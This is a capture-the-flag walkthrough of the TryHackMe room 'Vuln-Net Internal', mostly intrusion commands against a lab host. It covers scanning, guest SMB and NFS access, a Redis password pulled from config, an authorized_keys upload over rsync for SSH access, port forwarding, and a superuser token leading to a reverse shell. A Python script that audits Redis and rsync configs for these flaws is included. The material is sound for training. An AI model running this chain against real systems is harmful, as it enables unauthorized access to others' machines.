Vuln-Net Internal TryHackMe
Hello friends, today I want to talk about how to solve this room on TryHackMe.
Let's get started.
Enumeration
First I'll use Masscan to scan the open ports on our target.
sudo masscan -p 1-65535 --interface tun0 --rate 1000 10.10.23.179
Okay, let’s use Nmap to scan these services.
sudo nmap -sV -sC -sS -p 2049,54515,445,139,111,42429,22,6379,33859,37729,873 -oA scan/result 10.10.23.179
SMB Service
We can log in to the Samba service as a guest user. Let's log in and see whether we find anything.
smbclient -N -L //10.10.23.179
smbclient -N //10.10.23.179/shares
I'll download the files from these directories to see what is inside them.
get name_file.txt # download the file to the attacker VM
I found the first flag. Let's dig deeper.
NFS Service
showmount -e $IP
Let's mount this directory on the attacker VM.
mkdir mount
sudo mount -t nfs $IP:/opt/conf mount
After searching, I found a configuration file for the Redis database. Let's look at it.
cat redis.conf | grep -i "pass"
Great, I found the password. Let's see what we can do with it.
Redis
Now that we have a password, let's log in to the Redis database and see what we can do.
redis-cli -h $IP -p 6379 -a "B65Hx562*****" # login with the password
keys * # Returns all key names
get "internal flag" # Returns the value stored under that key
type name_keys # Returns the string representation of the type
lrange authlist 0 -1 # Returns every element of the list (indexes are zero-based, so start at 0)
Now we have something encoded; let's decode it.
echo "Value_encoded" | base64 -d
Okay, now we have these credentials. Let's see what we can do with them.
Rsync service
Rsync is a Linux utility that can synchronize files and directories remotely or locally.
rsync -av --list-only rsync://10.10.52.162 # Listing a shared folder
rsync -av rsync://rsync-connect@10.10.52.162/files ./rsync # Copying files from a shared folder
Now we have the user flag. Next, we can upload an authorized_keys file so we can connect via SSH.
ssh-keygen -t ed25519 # generates the id_ed25519 key pair used below
rsync -ahv ./authorized_keys rsync://rsync-connect@10.10.52.162/files/sys-internal/.ssh/authorized_keys --inplace --no-o --no-g
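As an added defender-side example (not part of the original writeup), the Python script below audits redis.conf and rsyncd.conf text for the two misconfigurations this chain relied on: a Redis password sitting in a config file that was reachable over a shared export, and an rsync module that let the connecting user write under a home directory. The config samples, module name and paths are constructed here, not taken from the room.

```python
import re
# Constructed redis.conf sample; the placeholder is not the room's password.
REDIS_CONF = """
bind 0.0.0.0
protected-mode no
requirepass EXAMPLE-PASSWORD-PLACEHOLDER
"""
# Constructed rsyncd.conf sample: a writable module with no auth users.
RSYNCD_CONF = """
[files]
    path = /home/sys-internal
    read only = no
    list = yes
"""
def audit_redis_conf(text):
    """Return findings for redis.conf directives that expose the instance."""
    directives = {}
    for line in text.splitlines():
        parts = line.split("#", 1)[0].split(None, 1)   # strip comments, split key/value
        if parts:
            directives[parts[0].lower()] = parts[1].strip() if len(parts) > 1 else ""
    findings = []
    bind = directives.get("bind", "").split()
    if not bind or any(addr in ("0.0.0.0", "::", "*") for addr in bind):
        findings.append("redis: bind exposes the port on all interfaces")
    if directives.get("protected-mode", "yes").lower() == "no":
        findings.append("redis: protected-mode is disabled")
    if "requirepass" not in directives:
        findings.append("redis: no requirepass set")
    else:  # the room's password leaked this way: the file sat on an NFS export
        findings.append("redis: requirepass is cleartext; keep redis.conf off shared exports")
    return findings

def audit_rsyncd_conf(text):
    """Return findings for rsync modules that are writable without authentication."""
    findings, module, opts = [], None, {}
    for raw in text.splitlines() + ["[end]"]:          # sentinel flushes the last module
        line = raw.split("#", 1)[0].strip()
        head = re.match(r"^\[(.+)\]$", line)
        if head:
            if module and opts.get("read only", "yes").lower() in ("no", "false", "0"):
                if "auth users" not in opts:
                    findings.append(f"rsync: module '{module}' is writable with no auth users")
                if opts.get("path", "").startswith("/home"):
                    findings.append(f"rsync: module '{module}' exposes a home dir (.ssh/ writable)")
            module, opts = head.group(1), {}
        elif "=" in line:
            key, value = line.split("=", 1)
            opts[key.strip().lower()] = value.strip()
    return findings
```

Run it against a host's real redis.conf and rsyncd.conf to confirm that Redis is bound to localhost and that no writable module points into a home directory.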
Foothold
ssh -i id_ed25519 sys-internal@10.10.52.162
After some enumeration, I found this.
ss -ltnp
Let's forward this port to our machine so we can visit the website.
ssh -i id_ed25519 sys-internal@10.10.52.162 -L 631:127.0.0.1:631
After searching this website I didn't find anything interesting. After forwarding the other internal service to my machine, I found this website.
ssh -i id_ed25519 sys-internal@10.10.52.162 -L 8111:127.0.0.1:8111
If you look at the version, you will see that this website runs an old release. Let's dig deeper.
I can access files on this website; let's search through them.
After reading this file I found a superuser token, logged in with that token without a username, and could then access the admin dashboard.
Now that we have superuser access, we need to create a new project > build configuration > build step and add a Python script to get a reverse shell.
Now we are root.
Thanks for reading.